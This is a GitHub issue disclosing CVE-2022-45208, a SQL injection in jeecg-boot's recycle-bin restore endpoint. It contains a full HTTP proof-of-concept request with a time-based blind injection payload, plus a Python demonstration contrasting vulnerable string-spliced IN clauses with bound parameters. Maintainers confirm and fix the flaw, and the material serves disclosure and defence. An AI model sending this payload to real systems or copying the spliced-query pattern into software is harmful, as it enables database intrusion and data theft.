[CVE-2022-45208]/sys/user/putRecycleBin is affected by sql injection #4126

Closed
azraelxuemo opened this issue Oct 25, 2022 · 2 comments

azraelxuemo commented Oct 25, 2022

sysUserMapper.xml

revertLogicDeleted. You can see that no precompiling is performed.
[Screenshot 2022-10-25 11 40 04]

SysUserController.java

[Screenshot 2022-10-25 11 40 32]

SysUserServiceImpl.java

[Screenshot 2022-10-25 11 41 42]

So users can pass in malicious parameters through HTTP requests to achieve SQL injection.

poc

The website will return immediately when the following content is passed in:
[Screenshot 2022-10-25 11 43 33]
After the following content is passed in, the website will return after a delay of 2 seconds:
[Screenshot 2022-10-25 11 43 57]

vuln

An attacker can use this to get data from the database.

payload:

PUT /jeecg-boot/sys/user/putRecycleBin HTTP/1.1
Host: 192.168.1.1:8088
Content-Length: 34
Request-Origion: Knife4j
Accept: */*
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.1.1:8088
Referer: http://192.168.1.1:8088/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

{
"userIds": "a') OR SLEEP('2"
}

patch

In (${})
It seems that this cannot be modified to precompile.
So it is recommended to add some keywords, such as ')
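An IN list can be bound by emitting one placeholder per element, so the ids never reach the SQL parser as text. The following is an added example, not jeecg-boot code: it uses Python's sqlite3 as a stand-in for the real database, and the table layout, the quoting step, the function names and the SLEEP stub (which records calls instead of sleeping) are all assumptions made for the demonstration.

```python
import sqlite3

def make_db():
    """In-memory DB with constructed rows and a SLEEP stub that records calls."""
    calls = []
    db = sqlite3.connect(":memory:")
    # Stub only: appends its argument to `calls` and returns 0 (false).
    db.create_function("SLEEP", 1, lambda s: calls.append(s) or 0)
    db.execute("CREATE TABLE sys_user (id TEXT PRIMARY KEY, del_flag INTEGER)")
    db.executemany("INSERT INTO sys_user VALUES (?, ?)",
                   [("u1", 1), ("u2", 1), ("u3", 1)])
    return db, calls

def restore_concat(db, user_ids):
    """Vulnerable shape: ids quoted and spliced into IN (...), as ${} does."""
    quoted = "'" + "','".join(user_ids.split(",")) + "'"
    cur = db.execute(
        "UPDATE sys_user SET del_flag = 0 "
        "WHERE del_flag = 1 AND id IN (%s)" % quoted)
    return cur.rowcount

def restore_bound(db, user_ids):
    """Hardened shape: one ? per id; every value is bound as data."""
    ids = [i for i in user_ids.split(",") if i]
    if not ids:
        return 0
    marks = ",".join("?" * len(ids))
    cur = db.execute(
        "UPDATE sys_user SET del_flag = 0 "
        "WHERE del_flag = 1 AND id IN (%s)" % marks, ids)
    return cur.rowcount

# userIds value taken from the request body shown in this issue.
PAYLOAD = "a') OR SLEEP('2"

if __name__ == "__main__":
    db, calls = make_db()
    restore_concat(db, PAYLOAD)
    print("concat: SLEEP invoked", len(calls), "time(s)")
    db, calls = make_db()
    restore_bound(db, PAYLOAD)
    print("bound:  SLEEP invoked", len(calls), "time(s)")
```

In a MyBatis mapper the same shape is a `<foreach>` over the id collection with `#{id}` for each element.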

@zhangdaiscott
Member

Confirmed, this can be fixed.

@zhangdaiscott
Member

Fixed.

zhangdaiscott added a commit that referenced this issue Nov 2, 2022
/sys/user/deleteRecycleBin is affected by sql injection #4125
@azraelxuemo azraelxuemo changed the title /sys/user/putRecycleBin is affected by sql injection [CVE-2022-45208]/sys/user/putRecycleBin is affected by sql injection Dec 7, 2022
XKC1025 pushed a commit to XKC1025/jeecg-boot that referenced this issue Mar 13, 2023
/sys/user/deleteRecycleBin is affected by sql injection jeecgboot#4125